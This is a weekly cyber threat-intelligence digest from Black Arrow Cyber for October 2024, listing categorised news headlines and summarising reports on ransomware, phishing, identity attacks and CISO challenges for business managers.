Modern Malware Is Stealthier Than Older Attacks: This Is How It Stays Hidden
Netskope Reports Possible Bumblebee Loader Resurgence - Infosecurity Magazine
Sneaky Ghostpulse malware loader hides inside PNG pixels • The Register
Hackers infect thousands of WordPress sites with malware plugins | PCWorld
Perfctl malware strikes again via Docker Remote API servers • The Register
'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)
Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans (thehackernews.com)
Bots/Botnets
Anti-Bot Services Help Cyber Crooks Bypass Google 'Red Page' (darkreading.com)
'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)
Mobile
Google Warns of Samsung Zero-Day Exploited in the Wild - SecurityWeek
Why you should power off your phone at least once a week - according to the NSA | ZDNET
Millions of mobile app users at risk from hardcoded creds • The Register
Location tracking of phones is out of control. Here’s how to fight back. - Ars Technica
Denial of Service/DoS/DDoS
How to detect DDoS attacks | TechTarget
Military Exercises Trigger Russian DDoS Attacks on Japan (govinfosecurity.com)
Russia-Linked Hacktivists Attack Japan's Govt, Ports (darkreading.com)
Data Breaches/Leaks
Internet Archive Breached Again, Hackers Exploited Unrotated API Tokens (cybersecuritynews.com)
Cisco Confirms Security Incident After Hacker Offers to Sell Data - SecurityWeek
Insurance admin Landmark says data breach impacts 800,000 people
Cisco takes DevHub portal offline after hacker publishes stolen data (bleepingcomputer.com)
Henry Schein discloses data breach a year after ransomware attack
Millions affected in major health data breach caused by a missing password | TechRadar
Data Breach Impacts Insurer Johnson and Johnson | MSSP Alert
Omni Family Health Data Breach Impacts 470,000 Individuals - SecurityWeek
Dance Apparel Company Sued After 65,000 Customers' Data Exposed
Organised Crime & Criminal Actors
Cyber criminal underground “thriving” as weekly attacks surge by 75% in Q3 2024 | ITPro
The evolution of cyber crime: How ransomware became the weapon of choice | TechRadar
'Pig butchering': How cyber criminals target investors with fake trading apps
Russia recommends prison sentence for REvil hackers | SC Media
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Cyber Criminals Exploiting Docker API Servers for SRBMiner Crypto Mining Attacks
Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)
'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)
Fraudulent DeFi game leveraged in new crypto investor-targeted Lazarus attack | SC Media
Insider Risk and Insider Threats
The Single Biggest Vulnerability in Your Cyber Security Is You : ScienceAlert
The Enemy Within: Navigating the Evolving Landscape of (globenewswire.com)
Fortinet report: 70% of staff lack cyber security awareness
Human error is the weakest link in the cyber security chain. Here are 3 ways to fix it
Insurance
Gallagher leader warns cyber is still an emerging risk | Insurance Times
Facing the uncertainty of cyber insurance claims - Help Net Security
The future of cyber insurance: Meeting the demand for non-attack coverage - Help Net Security
Supply Chain and Third Parties
Can the cyber security industry stop history repeating? | TechRadar
Cloud/SaaS
Think You're Secure? 49% of Enterprises Underestimate SaaS Risks
Microsoft lost some customers' cloud security logs - Help Net Security
Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers (thehackernews.com)
Half of Organisations Have Unmanaged Long-Lived Cloud Credentials - Infosecurity Magazine
Unmanaged Cloud Credentials Pose Risk to Half of Orgs (darkreading.com)
Top open source email platform hacked to steal user details | TechRadar
Navigating the Complexities & Security Risks of Multi-cloud Management
Evolving cloud threats: Insights and recommendations - Help Net Security
Grip Security Releases 2025 SaaS Security Risks Report
Microsoft creates fake Azure tenants to pull phishers into honeypots (bleepingcomputer.com)
Outages
Can the cyber security industry stop history repeating? | TechRadar
Identity and Access Management
Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media
A Comprehensive Guide to Finding Service Accounts in Active Directory
What is step-up authentication & how can it help prevent financial fraud? (businesscloud.co.uk)
Encryption
What NIST's post-quantum cryptography standards mean for data security
How to fend off a quantum computer attack - Help Net Security
Linux and Open Source
Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass (bleepingcomputer.com)
Why remove Russian maintainers of Linux kernel? Here's what Torvalds says | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
Half of Organisations Have Unmanaged Long-Lived Cloud Credentials - Infosecurity Magazine
Unmanaged Cloud Credentials Pose Risk to Half of Orgs (darkreading.com)
Top open source email platform hacked to steal user details | TechRadar
Millions of mobile app users at risk from hardcoded creds • The Register
The Key Components For a Secure Password Policy - Infosecurity Magazine (infosecurity-magazine.com)
Cisco fixes bug under exploit in brute-force attacks • The Register
Millions affected in major health data breach caused by a missing password | TechRadar
Social Media
LinkedIn bots and spear phishers target job seekers | Malwarebytes
Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations
What to Know About Meta’s Facial Recognition Plans | TIME
Training, Education and Awareness
55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)
Fortinet report: 70% of staff lack cyber security awareness
Employees lack fundamental security awareness (betanews.com)
Regulations, Fines and Legislation
EU’s NIS2 Directive for cyber security resilience enters full enforcement | CSO Online
How can businesses comply with EU’s new cyber law?
NIS2’s cyber security value spreads beyond its expanded scope | CSO Online
EU’s NIS2 Directive for cyber security resilience enters full enforcement | CSO Online
SEC.gov | SEC Charges Four Companies With Misleading Cyber Disclosures
EU’s NIS 2 enters into force: compliance is now mandatory
SEC charges tech companies for downplaying SolarWinds breaches (bleepingcomputer.com)
Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations
SEC is Not Accepting Half-Truths - Security Boulevard
UK Government Introduces New Data Governance Legislation - Infosecurity Magazine
SEC SolarWinds Fines a Warning to Organisations, MSSPs | MSSP Alert
Cyber Incident Response Checklist for SEC Compliance | Troutman Pepper - JDSupra
The struggle for software liability: Inside a ‘very, very, very hard problem’ (therecord.media)
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
OODA Loop - Board Members Should Review Cyber Risk Disclosure Procedures Following SEC Enforcement
Models, Frameworks and Standards
EU’s NIS2 Directive for cyber security resilience enters full enforcement | CSO Online
How can businesses comply with EU’s new cyber law?
How can businesses comply with EU’s new cyber law?
NIS2’s cyber security value spreads beyond its expanded scope | CSO Online
EU’s NIS 2 enters into force: compliance is now mandatory
EU Adopts Cyber Resilience Act For Connected Devices
What NIST's post-quantum cryptography standards mean for data security
What is DORA – and how can Proton help with compliance? | Proton
Data Protection
Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations
Careers, Working in Cyber and Information Security
What even is a ‘cyber security profession’?
CISOs Concerned Over Growing Demands of Role - Security Boulevard
Cyber security leaders struggle with job stress (devx.com)
Joe Sullivan: CEOs must be held accountable for security too | TechTarget
CISOs respond: 49% of CISOs plan to leave role without industry action | Security Magazine
Making Cyber Security Accessible For Neurodiverse Talent (darkreading.com)
What's more important when hiring for cyber security roles? - Help Net Security
What I’ve learned in my first 7-ish years in cyber security
Law Enforcement Action and Take Downs
Bumblebee malware returns after recent law enforcement disruption (bleepingcomputer.com)
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
CISA proposes new security requirements for businesses exposed to cyber espionage | CSO Online
Nation State Actors
China
Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain
Gambling sector subjected to APT41 intrusions | SC Media
Russia
Russian Intelligence Ramps Up Global Cyber Campaign, Says Western Intelligence
Former UK special forces director warns of Russian cyber-security threat - Jersey Evening Post
Russian Trolls Sow US Election Chaos (darkreading.com)
Military Exercises Trigger Russian DDoS Attacks on Japan (govinfosecurity.com)
How Russia’s Spies Hacked the Entire Nation of Georgia – BNN Bloomberg
Russian Strategic Information Attack for Catastrophic Effect
Russia-Linked Hacktivists Attack Japan's Govt, Ports (darkreading.com)
Why remove Russian maintainers of Linux kernel? Here's what Torvalds says | ZDNET
Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks (thehackernews.com)
Russian Foreign Ministry reports 'large-scale' cyber attack on its resources
Russia recommends prison sentence for REvil hackers | SC Media
Iran
Iranian hackers act as brokers selling critical infrastructure access (bleepingcomputer.com)
North Korea
Experts warn North Koreans are posing as IT workers in the West
Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices
Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)
HYPR is latest firm to reveal hiring of fraudulent IT worker overseas | CyberScoop
Cyber firm launches free tool to weed out hackers in hiring process
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Sidewinder APT Deploying Expanded Attacks | MSSP Alert
Think Tanks Urge Action to Curb Misuse of Spyware and Hack-for-Hire - Infosecurity Magazine
Tools and Controls
Understanding the Importance of MFA: A Comprehensive Guide - Security Boulevard
Time to Get Strict With DMARC (darkreading.com)
55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)
Microsoft lost some customers' cloud security logs - Help Net Security
A Business Continuity Cheat Sheet - Compare the Cloud
Can the cyber security industry stop history repeating? | TechRadar
A Comprehensive Guide to Finding Service Accounts in Active Directory
Call for cyber security sea change as world looks to meet rising threats
Fortinet report: 70% of staff lack cyber security awareness
Cyber resilience vs. cyber security: Which is more critical? (betanews.com)
CISOs: Throwing Cash at Tools Isn't Helping Detect Breaches (darkreading.com)
Multi-layered security is the key to keeping data safe – here’s why | ITPro
Effective strategies for measuring and testing cyber resilience - Help Net Security
New Research Underscores the Growing Security Risk Due to Hybrid Work Environments | Business Wire
Negating AI cyber attacks with defence in depth | TechRadar
Threat intelligence vs. threat hunting: Better together | TechTarget
API Vulnerabilities Jump 21% in Third Quarter - Security Boulevard
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
68% of directors don't have a board-approved AI policy - IoD Ireland
Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA
Achieving peak cyber resilience - Help Net Security
Cyber security incident response: Is your business prepared? | Proton
Microsoft creates fake Azure tenants to pull phishers into honeypots (bleepingcomputer.com)
Unclear pricing for GRC tools creates market confusion - Help Net Security
Five Ways To Improve Your Security Posture, Fast
Enhancing Cyber Security Post-Breach: A Comprehensive Guide - Security Boulevard
What is Third-Party Risk Monitoring in Cyber Security? | UpGuard
Other News
Acronym Overdose – Navigating the Complex Data Security Landscape (thehackernews.com)
The Rise of Cyber Attacks on Critical Infrastructure: Are You Prepared? - Security Boulevard
Why Cyber Security Should Be at the Top of the Agenda for the Utilities Sector (thefastmode.com)
The American Water cyber attack: Explaining how it happened (techtarget.com)
Security Checks: 85% of Online Shoppers Make Security a Top Priority
IT security and government services: Balancing transparency and security - Help Net Security
Vulnerability Management
Threat actors exploit zero days within 5 days, says Google's Mandiant | SC Media (scworld.com)
What is Vulnerability Management? Compliance, Challenges, & Solutions - Security Boulevard
Threat Actors Are Exploiting Vulnerabilities Faster Than Ever (techrepublic.com)
Vulnerabilities
Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass (bleepingcomputer.com)
Microsoft launches Edge 130 with lots of security patches and feature changes - gHacks Tech News
MacOS Safari Exploit Exposes Camera, Mic, Browser Data (darkreading.com)
Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers (thehackernews.com)
Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices
Atlassian Patches Vulnerabilities in Bitbucket, Confluence, Jira - SecurityWeek
Fortinet releases patches for undisclosed critical FortiManager vulnerability - Help Net Security
HM Surf macOS vuln potentially exploited by Adloader malware • The Register
Google Warns of Samsung Zero-Day Exploited in the Wild - SecurityWeek
VMware fixes critical vCenter Server RCE bug - again! (CVE-2024-38812) - Help Net Security
CISA confirms Veeam vulnerability is being used in ransomware attacks (therecord.media)
Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign (securityaffairs.com)
Samsung phone users exposed to EoP attacks, Google warns • The Register
High-risk vulnerability affecting UniFi Network Server | Cybernews
CISA Warns Recent Microsoft SharePoint RCE Flaw Exploited in Attacks - SecurityWeek
Microsoft SharePoint RCE under active exploit • The Register
Cisco fixed tens of vulnerabilities, including an actively exploited one
Cisco fixes VPN DoS flaw discovered in password spray attacks
Hackers infect thousands of WordPress sites with malware plugins | PCWorld
Nvidia Patches High-Severity Flaws in Windows, Linux Graphics Drivers - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 18 October 2024
Black Arrow Cyber Threat Intelligence Briefing 18 October 2024:
-70% of Senior Executives Targeted by Cyber Attack in Past 18 Months, New Study Reveals
-Defenders Must Adapt to Shrinking Exploitation Timelines
-Supply Chain Vulnerabilities are Facilitating a Surge in Ransomware
-Limited Visibility and Tool Proliferation Prevent CISOs from Detecting Breaches
-Organisations Need to Better Prepare Swiftly from Cyber Attacks, New NCSC Head Warns
-Microsoft Logs 600 million Identity Attacks Per Day as Nation-States Team Up with Cyber Criminals for Attacks
-Over 90% of Phishing Campaigns Lead Victims to Malware
-Here’s How Attackers Are Getting Around Phishing Defences
-Firm Hacked After Accidentally Hiring North Korean Cyber Criminal
-Rampant Ransom Payments Highlight Need for Urgent Action on Cyber Resiliency
-October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Programme
-Phishing Tactics: The Top Attacks Trends in 2024
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
70% of Senior Executives Targeted by Cyber Attack in Past 18 Months, New Study Reveals
A recent report from GetApp highlights that 70% of senior executives have been targeted by cyber attacks in the last 18 months, with AI-driven deepfakes contributing to 22% of attacks. 42% of companies overlook the risks of unsecured communication channels, and 41% fail to regularly update systems. Additionally, 28% of organisations globally do not provide specialised cyber security training for executives, leaving businesses vulnerable to evolving threats.
Defenders Must Adapt to Shrinking Exploitation Timelines
A Mandiant report reveals that the time for attackers to exploit vulnerabilities has dropped sharply to just five days in 2023, down from 32 days in 2022. Zero-day vulnerabilities, which are unknown to vendors, have been favoured over publicly known (n-day) flaws, accounting for 70% of first exploits. Despite media attention, only a portion of vulnerabilities are actively exploited. The findings emphasise the importance of rapid patching and segmented network architectures to reduce risk, as threat actors increasingly exploit vulnerabilities across diverse technologies. Effective prioritisation of patching is now more critical than ever.
Supply Chain Vulnerabilities are Facilitating a Surge in Ransomware
A new report highlights the rising threat of ransomware attacks stemming from software supply chain vulnerabilities, with 62% of small and medium-sized businesses impacted. The findings reveal that 91% of businesses are concerned about ransomware affecting their downstream partners, with nearly half considering changing vendors. The role of AI in cyber attacks is also increasing, with 55% of businesses feeling more at risk due to AI-enhanced threats. Despite the challenges, 97% of those affected managed to restore their data, though 46% had to pay a ransom, with 31% paying over $1 million.
Limited Visibility and Tool Proliferation Prevent CISOs from Detecting Breaches
Despite global security spending set to reach $215 billion in 2024, 44% of CISOs reported failing to detect data breaches over the past year. A key issue is limited visibility, with 70% acknowledging their tools fall short in identifying breaches across hybrid cloud infrastructure. Gaining full visibility into encrypted and lateral traffic is critical, as 93% of malware hides there. CISOs are also overwhelmed by tool proliferation, with 60% prioritising tool consolidation. Concerns around AI-driven cyber attacks are rising, and 46% plan to implement AI to address visibility gaps and improve detection capabilities.
Organisations Need to Better Prepare to Recover Swiftly from Cyber Attacks, New NCSC Head Warns
The new head of the UK’s National Cyber Security Centre, Dr Richard Horne, has warned of escalating cyber threats, and the importance of preparing organisations to recover swiftly from cyber attacks. In 2024 alone, the NCSC responded to 50% more major incidents compared to the previous year, with severe attacks tripling. This rise in threats is driven by the expanding cyber crime marketplace, lowering the barriers for attackers. Horne stressed the need for global collaboration and for security to be embedded in technology from the start.
Microsoft Logs 600 million Identity Attacks Per Day as Nation-States Team Up with Cyber Criminals for Attacks
Microsoft’s 2024 Digital Defence Report reveals a significant rise in identity-based cyber attacks, tracking 600 million attacks over the fiscal year. Despite 41% of enterprises adopting multi-factor authentication (MFA), attackers bypass MFA through infrastructure vulnerabilities. Password attacks, such as phishing and brute force methods, still account for over 99% of these incidents. Although attempted ransomware attacks surged by 2.75 times, successful data encryption fell by threefold. Notably, state-backed cyber criminal collaborations are growing, complicating attack attribution, while AI and passwordless authentication are highlighted as essential for future protection.
Over 90% of Phishing Campaigns Lead Victims to Malware
A recent Comcast Business report highlights phishing as the top cyber security threat in 2023, with over 2.6 billion interactions detected. More than 90% of these phishing attempts aimed to direct victims to sites hosting malware, emphasising the need for stronger anti-phishing measures and staff education. Remote services were the primary method for lateral movement, with over 409 million events detected. The report recommends adopting tools like endpoint detection and response (EDR) and managed detection and response (MDR) to help IT teams detect and respond to early-stage threats through real-time network monitoring.
Here’s How Attackers Are Getting Around Phishing Defences
Email security provider Egress' latest report reveals that cyber attackers are bypassing phishing defences by manipulating natural language processing (NLP) technologies used in email filters. They achieve this by inserting benign text, links, and other obfuscation techniques, allowing malicious emails to pass through undetected. Notably, 78% of malicious emails incorporate multiple evasion tactics. Attackers exploit weaknesses in email security systems, including slow processing times that may cause incomplete scans. This trend is concerning, as phishing remains a significant threat, contributing to 31% of all security incidents according to Verizon’s 2024 breach report.
Firm Hacked After Accidentally Hiring North Korean Cyber Criminal
A company was hacked after unknowingly hiring a North Korean cyber criminal as a remote IT worker. The individual, who falsified employment history and personal details, gained access to the company’s network, stole sensitive data, and later demanded a ransom in cryptocurrency. This incident highlights an increasing threat of North Korean workers infiltrating Western firms to fund their regime, with many cases emerging since 2022. While most of these workers are after steady income, this case marks a significant shift towards data theft and extortion from within company defences.
Rampant Ransom Payments Highlight Need for Urgent Action on Cyber Resiliency
According to the Global Cyber Resilience Report 2024, 69% of organisations have paid ransoms this year, despite 77% having a 'do not pay' policy. Only 2% of firms can recover data within 24 hours, despite 98% setting that as their target. This highlights a major gap between perceived and actual cyber resilience. Organisations are unprepared for modern threats, with fewer than half implementing essential security measures like multi-factor authentication. To reduce risks, businesses must adopt modern data security practices, engage in realistic threat simulations, and invest in automated recovery systems to mitigate the growing threat of AI-driven cyber attacks.
October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Programme
October marks the 21st annual Cyber Security Awareness Month, highlighting the importance of user awareness in defending against cyber attacks. The US Cyber Security and Infrastructure Security Agency (CISA) reports that 90% of successful cyber attacks start with phishing, and Verizon notes that human factors are involved in 68% of breaches. This underscores the need for continuous training across all levels of an organisation. Key actions include using strong passwords, enabling multi-factor authentication, and maintaining up-to-date systems. It’s a good time to review or implement training programmes, ensuring they meet current standards and promote security awareness both at work and home.
Phishing Tactics: The Top Attacks Trends in 2024
Phishing attacks have evolved beyond email, with AI enabling more personalised and sophisticated tactics, such as voice cloning and deepfakes. Attackers increasingly combine phishing with other cyber attacks, like ransomware, to compromise entire networks. This can lead to data breaches, financial losses, and legal consequences under regulations like GDPR. Organisations must adopt a multi-layered defence strategy, combining employee training, multi-factor authentication, and advanced filtering tools. Regular incident response planning is also crucial to minimise the impact of phishing attacks, as techniques continue to grow more complex and harder to detect.
Sources:
https://www.helpnetsecurity.com/2024/10/16/time-to-exploit-vulnerabilities-2023/
https://www.techradar.com/pro/supply-chain-vulnerabilities-are-facilitating-a-surge-in-ransomware
https://www.helpnetsecurity.com/2024/10/18/cisos-security-tools/
https://www.infosecurity-magazine.com/news/cyber-threats-defend-ncsc-head/
https://cyberscoop.com/email-natural-language-obfuscation-phishing-egress/
https://www.bbc.co.uk/news/articles/ce8vedz4yk7o
https://www.jdsupra.com/legalnews/october-is-cybersecurity-awareness-5531410/
https://www.itpro.com/security/cyber-attacks/phishing-tactics-the-top-attacks-trends-in-year
Governance, Risk and Compliance
Gap Between Cyber Threats And Defences ‘Widening’, Cyber Security Chief Warns - PM Today
UK Reports 50% Spike in 'Nationally Significant' Incidents (inforisktoday.com)
'Nationally significant' cyber attacks are surging, warns the UK's new cyber chief (therecord.media)
Despite massive security spending, 44% of CISOs fail to detect breaches - Help Net Security
Cyber crime's constant rise is becoming everyone's problem - Help Net Security
The Cyber Security Burnout Crisis Is Reaching The Breaking Point (forbes.com)
A quarter of cyber security leaders are ready to quit (betanews.com)
Most businesses “overconfident and underprepared” for 2025 cyber threats – PCR (pcr-online.biz)
Why Cyber Security’s Core Focus Should Be Defending Data (govinfosecurity.com)
Cyber security compliance: the heavy burden of regulations on IT leaders - Raconteur
Return on cyber investment | Professional Security Magazine
What Cyber Security Leaders Can Learn From Golf (darkreading.com)
Cyber Security Awareness Month: How CISOs can engage, educate, and empower - Security Boulevard
CISOs' Privacy Responsibilities Keep Growing (darkreading.com)
What Is the ‘Most Pressing Concern’ for Cyber Professionals? (techrepublic.com)
While Cyber Attacks Are Inevitable, Resilience Is Vital (automation.com)
Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)
Threats
Ransomware, Extortion and Destructive Attacks
More Ransoms Being Paid and More Data Being Lost: Hornetsecurity - Security Boulevard
RansomHub becomes dominant ransomware group in Q3 2024 (securitybrief.co.nz)
Basic cyber hygiene still offers the best defence against ransomware | SC Media (scworld.com)
53% of survey respondents admit to paying over $500,000 ransom | Security Magazine
Are You Prepared for Ransomware IRL? - Security Boulevard
Ransomware Attacks Tripled for Microsoft Customers Last Year (tech.co)
Supply chain vulnerabilities are facilitating a surge in ransomware | TechRadar
Would banning ransomware insurance stop the scourge? • The Register
Schools under siege: from nation-states to ransomware gangs • The Register
99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)
Ransomware Threats Surge with 31 New Groups in 2024 (techinformed.com)
Ransomware still a major threat despite disruption to RaaS groups (betanews.com)
Rampant ransom payments highlight need for urgent action on cyber resiliency | TechRadar
Akira, Fog Ransomware Leverages Critical Veeam RCE | MSSP Alert
INC ransomware rebranded to Lynx, say security researchers • The Register
Ransomware Victims
53% of survey respondents admit to paying over $500,000 ransom | Security Magazine
How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)
Casio Confirms Ransomware Outage and Data Breach - Infosecurity Magazine (infosecurity-magazine.com)
Schools under siege: from nation-states to ransomware gangs • The Register
Casio says 'no prospect of recovery yet' after ransomware attack | TechCrunch
India’s biggest health insurer gets ransomware following data breach | TechRadar
Hackers blackmail Globe Life after stealing customer data (bleepingcomputer.com)
BianLian ransomware claims attack on Boston Children's Health Physicians (bleepingcomputer.com)
Phishing & Email Based Attacks
How AI created an email security gap | SC Media (scworld.com)
Attackers are using QR codes sneakily crafted in ASCII and blob URLs in phishing emails | CSO Online
Here’s how attackers are getting around phishing defences | CyberScoop
Phishing tactics: The top attacks trends in 2024 | ITPro
Over 90% of phishing campaigns lead victims to malware | Security Magazine
Phishing tactics: The top attacks trends in 2024 | ITPro
99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)
Be Aware of These Eight Underrated Phishing Techniques - SecurityWeek
Someone Just Lost $35 Million Worth of Crypto After Falling for This Phishing Scam
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
Firm hacked after accidentally hiring North Korean cyber criminal - BBC News
99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)
Scammers use AI to create convincing Gmail phishing calls (appleinsider.com)
What is tailgating (piggybacking) and how to prevent it? | Definition from TechTarget
Alabama man arrested for role in SEC Twitter account hijacking | CyberScoop
Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI
Artificial Intelligence
How AI created an email security gap | SC Media (scworld.com)
From Misuse to Abuse: AI Risks and Attacks (thehackernews.com)
World Economic Forum: AI, Quantum Require ‘Paradigm Shift’ in Security - Security Boulevard
What Is Deepfake Technology? Ultimate Guide To AI Manipulation (eweek.com)
AI is bringing XSS vulnerabilities back to the spotlight | CSO Online
Navigating the Cyber Security Risks of Shadow & Open-Source GenAI - Security Boulevard
LLMs Are a New Type of Insider Adversary (darkreading.com)
Anthropic flags AI's potential to 'automate sophisticated destructive cyber attacks' | ZDNET
Deepfake lovers swindle victims out of $46M in Hong Kong AI scam - Ars Technica
AI Report Finds 74% of Cyber Security Leaders Aware of Sensitive Data Risks | Business Wire
AI data collection under fire - Help Net Security
4 Frightening Things Coming For Security This Season (informationsecuritybuzz.com)
How to Mitigate the Impact of Rogue AI Risks | Trend Micro (US)
NY's Financial Regulator Releases AI Cyber Security Guidance - Law360
AI Companies Are Not Meeting EU AI Act Standards (informationsecuritybuzz.com)
2FA/MFA
Cyber Crime Agency Issues New 2FA Warning For Gmail, Outlook, Facebook And X Users (forbes.com)
Malware
Over 90% of phishing campaigns lead victims to malware | Security Magazine
OpenAI confirms threat actors use ChatGPT to write malware (bleepingcomputer.com)
New Malware Campaign Uses PureCrypter Loader to Deliver DarkVision RAT (thehackernews.com)
New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)
Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)
North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)
Researchers Uncover Hijack Loader Malware Using Stolen Code-Signing Certificates (thehackernews.com)
New FASTCash malware Linux variant helps steal money from ATMs (bleepingcomputer.com)
Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Attack (thehackernews.com)
Fake Google Meet pages deliver infostealers - Help Net Security
Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI
Researchers Uncover Hijack Loader Malware Using Stolen Code-Signing Certificates (thehackernews.com)
Bots/Botnets
How DDoS Botent is used to Infect your Network? - Security Boulevard
Mobile
Over 200 malicious apps on Google Play downloaded millions of times (bleepingcomputer.com)
Which? warns UK users to keep mobile numbers to avoid security risks - Neowin
TrickMo’s Latest Trick - Stealing PINs And Unlock Patterns (informationsecuritybuzz.com)
The hidden risks of IoT: Why businesses need to modernize mobile security | TechRadar
Android banking trojan stealing money: no antivirus software can detect it | Cybernews
What to do if your iPhone or Android smartphone gets stolen? - Help Net Security
Not iPhones, but secure Android phones: that's what Trump's campaign uses - PhoneArena
Trump campaign gets 'unhackable' phones • The Register
Denial of Service/DoS/DDoS
A Deep Dive into DDoS Carpet-Bombing Attacks - Security Boulevard
How DDoS Botent is used to Infect your Network? - Security Boulevard
Independent Russian news site rides out a week of DDoS incidents (therecord.media)
Largest DDoS Cloudflare Attack On Global Sectors Mitigated - Security Boulevard
Internet of Things – IoT
Hackers took over robovacs to chase pets and yell slurs - The Verge
Hackers Made Robot Vacuums Shout Racist Slurs in Their Owners’ Homes (pcmag.com)
The hidden risks of IoT: Why businesses need to modernize mobile security | TechRadar
Organisations Slow to Protect Doors Against Hackers: Researcher - SecurityWeek
Data Breaches/Leaks
Data breaches trigger increase in cyber insurance claims - Help Net Security
Cisco investigates breach after stolen data for sale on hacking forum (bleepingcomputer.com)
Data Breaches: The Not-So-Hidden Cost of Doing Business | Baker Donelson - JDSupra
Fidelity Investments Data Breach Impacts 77,000 Customers - SecurityWeek
US healthcare org admits up to 400k people's data stolen • The Register
Cisco confirms ongoing probe into alleged data breach • The Register
Contractor pays $300K to settle Medicare data breach • The Register
Casio confirms customer data stolen in a ransomware attack (bleepingcomputer.com)
Hackers blackmail Globe Life after stealing customer data (bleepingcomputer.com)
Game Freak Confirms 1TB Data Leaked in Breach | MSSP Alert
Hundreds of thousands of CVs leaked - here's what we know | TechRadar
Organised Crime & Criminal Actors
Microsoft wants tougher punishments for cyber criminals • The Register
Cyber crime's constant rise is becoming everyone's problem - Help Net Security
Southeast Asian Cyber Crime Profits Fuel Shadow Economy (darkreading.com)
Microsoft logs 600 million identity attacks per day as threat actors collaborate more | ITPro
Escalating Cyber Threats Demand Stronger Global Defence and Cooperation - Microsoft On the Issues
The Wiretap: Microsoft Says Kremlin Is Working With Cyber Criminals To Spy On Ukraine (forbes.com)
Cyber Gangs Aren't Afraid of Prosecution (darkreading.com)
Brazilian Police Arrest Notorious Hacker USDoD - SecurityWeek
Two alleged operators of Anonymous Sudan named, charged • The Register
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Someone Just Lost $35 Million Worth of Crypto After Falling for This Phishing Scam
North Korean hackers steal $3B in crypto since 2017: report | Invezz
Radiant Capital Suffers $50M Loss in Second Major Hack - DailyCoin
Insider Risk and Insider Threats
The NHI management challenge: When employees leave - Help Net Security
LLMs Are a New Type of Insider Adversary (darkreading.com)
Insurance
Would banning ransomware insurance stop the scourge? • The Register
Data breaches trigger increase in cyber insurance claims - Help Net Security
Supply Chain and Third Parties
Supply chain vulnerabilities are facilitating a surge in ransomware | TechRadar
How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)
Cyber Security Experts Brace for the Next Crisis After the CrowdStrike Near-Disaster - ClearanceJobs
UK Public sector at risk from supply chain attacks, new report warns | ITPro
Cloud/SaaS
Why are we still confused about cloud security? | InfoWorld
Why companies are struggling to keep up with SaaS data protection - Help Net Security
Tenable releases report on cloud security (devx.com)
38% of organisations are at risk of critical exposures | Security Magazine
